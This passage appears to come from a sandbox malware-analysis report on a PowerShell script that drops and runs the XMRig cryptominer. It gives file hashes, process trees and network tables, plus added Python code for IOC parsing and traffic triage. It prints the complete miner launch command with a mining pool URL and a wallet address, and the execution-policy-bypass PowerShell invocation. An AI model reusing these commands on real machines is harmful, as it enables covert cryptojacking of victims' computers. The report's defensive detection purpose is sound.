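            # -ep / -f are the common abbreviations of -ExecutionPolicy / -File
            if tok in ("-executionpolicy", "-ep") and low[i + 1] in ("bypass", "unrestricted"):
                reasons.append("parent: powershell execution policy " + low[i + 1])
            if tok in ("-file", "-f") and "\\appdata\\local\\temp\\" in low[i + 1]:
                reasons.append("parent: script run from %LOCALAPPDATA%\\Temp")
    if "\\appdata\\local\\temp\\" in miner.image.lower():
        reasons.append("child: image executed from %LOCALAPPDATA%\\Temp")
    if miner.pool_host:
        if any(miner.pool_host == d or miner.pool_host.endswith("." + d) for d in POOL_DOMAINS):
            reasons.append("child: pool host on watchlist (" + miner.pool_host + ")")
        if miner.pool_port == 443:
            reasons.append("child: stratum over port 443, blends with HTTPS egress")
    if miner.wallet:
        reasons.append("child: wallet/worker present (" + (miner.worker or "?") + ")")
    return reasons


if __name__ == "__main__":
    iocs = parse_xmrig_cmdline(XMRIG_CMD)
    print(iocs)
    for reason in score_launch_chain(POWERSHELL_CMD, iocs):
        print("-", reason)
```

The same parser applies unchanged to the command lines in the other behavioral runs on this page, since only the `(N)` in the script name differs between them.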

Files

memory/2664-0-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_obpg3x3r.fff.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2664-9-0x000001D7FF7A0000-0x000001D7FF7C2000-memory.dmp

memory/2664-10-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2664-11-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2664-12-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2664-14-0x000001D7FF7D0000-0x000001D7FF7E2000-memory.dmp

memory/2664-15-0x000001D7FE120000-0x000001D7FE12A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1452-46-0x00000239932C0000-0x00000239932E0000-memory.dmp

memory/1452-47-0x0000023A25880000-0x0000023A258A0000-memory.dmp

memory/1452-48-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-51-0x0000023A25CC0000-0x0000023A25CE0000-memory.dmp

memory/1452-50-0x0000023A25EF0000-0x0000023A25F10000-memory.dmp

memory/2664-49-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2664-53-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

memory/1452-52-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-54-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-55-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-56-0x0000023A25EF0000-0x0000023A25F10000-memory.dmp

memory/1452-57-0x0000023A25CC0000-0x0000023A25CE0000-memory.dmp

memory/1452-58-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-59-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-60-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-61-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-62-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-63-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-64-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-65-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-66-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-67-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-68-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-69-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-70-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-71-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-72-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-73-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-74-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-75-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-76-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-77-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-78-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-79-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-80-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-81-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-82-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-83-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-84-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-85-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-86-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-87-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-88-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-89-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-90-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-91-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-92-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-93-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-94-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-95-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-96-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-97-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-98-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-99-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-100-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-101-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-102-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-103-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-104-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-105-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-106-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-107-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-108-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-109-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-110-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-111-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-112-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-113-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-114-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-115-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-116-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:11

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, every one with Description, Indicator, Process and Target reported as N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
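The Network table above mixes three kinds of traffic: the download path (github.com, then objects.githubusercontent.com over 443, consistent with the dropped xmrig-6.21.3\xmrig.exe being a GitHub release artefact), the mining pool (rx.unmineable.com at 161.35.34.195:443), and noise from the sandbox host (www.bing.com plus a run of in-addr.arpa PTR queries to 8.8.8.8). The Python below is an added example, not part of the report: it parses a subset of these rows, copied verbatim from this table, turns each PTR name back into the IP it names so it can be matched against the TCP destinations, and separates reportable domains and endpoints from background traffic. The suffix lists that drive the classification are my own assumptions, and treating bing.com traffic as Windows background activity is an analyst judgement, not something the report states.

```python
"""Triage the Network table of this report: separate attacker infrastructure
from sandbox background traffic and fold PTR lookups back onto the IPs they name.

Added example; not part of the sandbox output. NETWORK_ROWS is a subset of rows
copied from the behavioral31 Network table. The suffix lists and the category
names are my own analyst assumptions.
"""
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Optional

NETWORK_ROWS = """\
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
"""

# Assumed suffix lists; only the domains seen in this report are listed.
POOL_SUFFIXES = ("unmineable.com",)                         # mining pool
STAGING_SUFFIXES = ("github.com", "githubusercontent.com")  # where the binary was fetched
BENIGN_SUFFIXES = ("bing.com", "bing.net")                  # Windows background traffic (assumption)


@dataclass(frozen=True)
class Flow:
    country: str
    ip: str
    port: int
    name: str
    proto: str


def parse_rows(text: str) -> list:
    """Parse 'Country Destination Domain Proto' rows as printed in the report."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        country, dest, name, proto = line.split()
        ip, _, port = dest.rpartition(":")
        flows.append(Flow(country, ip, int(port), name, proto))
    return flows


def ptr_to_ip(name: str) -> Optional[str]:
    """'195.34.35.161.in-addr.arpa' -> '161.35.34.195'. PTR labels are the IPv4
    octets in reverse order; anything malformed returns None."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) != 4:
        return None
    try:
        return str(ip_address(".".join(reversed(labels))))
    except ValueError:
        return None


def _under(name: str, suffixes) -> bool:
    return any(name == s or name.endswith("." + s) for s in suffixes)


def classify(flow: Flow) -> str:
    if flow.port == 53 and flow.proto == "udp":
        return "ptr-lookup" if ptr_to_ip(flow.name) else "dns-query"
    if _under(flow.name, POOL_SUFFIXES):
        return "mining-pool"
    if _under(flow.name, STAGING_SUFFIXES):
        return "payload-staging"
    if _under(flow.name, BENIGN_SUFFIXES):
        return "background-noise"
    return "unclassified"


def triage(text: str) -> dict:
    flows = parse_rows(text)
    tcp_ips = {f.ip for f in flows if f.proto == "tcp"}
    ptr_ips = {ptr_to_ip(f.name) for f in flows if classify(f) == "ptr-lookup"}
    return {
        "counts": dict(Counter(classify(f) for f in flows)),
        # domains worth reporting, whether seen as a DNS query or a TCP destination
        "ioc_domains": sorted({f.name for f in flows
                               if _under(f.name, POOL_SUFFIXES + STAGING_SUFFIXES)}),
        "ioc_endpoints": sorted({f"{f.ip}:{f.port}" for f in flows if f.proto == "tcp"
                                 and classify(f) in ("mining-pool", "payload-staging")}),
        # reverse lookups of IPs we connected to: not new infrastructure
        "ptr_of_known_destinations": sorted(ip for ip in ptr_ips if ip in tcp_ips),
        # reverse lookups of IPs with no matching connection in this table
        "ptr_of_other_ips": sorted(ip for ip in ptr_ips if ip not in tcp_ips),
    }


if __name__ == "__main__":
    for key, value in triage(NETWORK_ROWS).items():
        print(key, value)
```

Three of the four PTR names in this subset resolve back to the github.com, objects.githubusercontent.com and rx.unmineable.com addresses already present as TCP destinations, so they add no infrastructure; the remaining one (20.211.142.183) has no matching connection in the table and would need a separate look before being reported.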

Files

memory/3708-0-0x00007FF841563000-0x00007FF841565000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hteirlwz.f4r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3708-10-0x0000024250F40000-0x0000024250F62000-memory.dmp

memory/3708-11-0x00007FF841560000-0x00007FF842021000-memory.dmp

memory/3708-12-0x00007FF841560000-0x00007FF842021000-memory.dmp

memory/3708-14-0x00007FF841560000-0x00007FF842021000-memory.dmp

memory/3708-15-0x0000024251350000-0x0000024251362000-memory.dmp

memory/3708-16-0x0000024250F70000-0x0000024250F7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4496-47-0x0000016325220000-0x0000016325240000-memory.dmp

memory/4496-48-0x0000016326B20000-0x0000016326B40000-memory.dmp

memory/4496-49-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-52-0x0000016326B60000-0x0000016326B80000-memory.dmp

memory/4496-50-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-51-0x0000016326B40000-0x0000016326B60000-memory.dmp

memory/3708-53-0x00007FF841563000-0x00007FF841565000-memory.dmp

memory/3708-54-0x00007FF841560000-0x00007FF842021000-memory.dmp

memory/4496-55-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-56-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-58-0x0000016326B60000-0x0000016326B80000-memory.dmp

memory/4496-57-0x0000016326B40000-0x0000016326B60000-memory.dmp

memory/4496-59-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-60-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-61-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-62-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-63-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-64-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-65-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-66-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-67-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-68-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-69-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-70-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-71-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-72-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-73-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-74-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-75-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-76-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-77-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-78-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-79-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-80-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-81-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-82-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-83-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-84-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-85-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-86-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-87-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-88-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-89-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-90-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-91-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-92-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-93-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-94-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-95-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-96-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-97-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-98-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-99-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-100-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-101-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-102-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-103-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-104-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-105-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-106-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-107-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-108-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-109-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-110-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-111-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-112-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-113-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-114-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-115-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-116-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-117-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, every one with Description, Indicator, Process and Target reported as N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp

Files

memory/2168-0-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp

memory/2168-1-0x000001C42E7D0000-0x000001C42E7F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3u50vjl.4lv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2168-11-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/2168-12-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/2168-14-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/2168-15-0x000001C42EC80000-0x000001C42EC92000-memory.dmp

memory/2168-16-0x000001C4159F0000-0x000001C4159FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/456-47-0x000002684CEF0000-0x000002684CF10000-memory.dmp

memory/456-48-0x000002684CF40000-0x000002684CF60000-memory.dmp

memory/456-49-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/2168-51-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp

memory/456-50-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/2168-52-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/456-54-0x000002684CF80000-0x000002684CFA0000-memory.dmp

memory/456-53-0x000002684CF60000-0x000002684CF80000-memory.dmp

memory/2168-55-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/456-56-0x00007FF746C10000-0x00007FF747843000-memory.dmp

memory/456-58-0x000002684CF60000-0x000002684CF80000-memory.dmp


Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
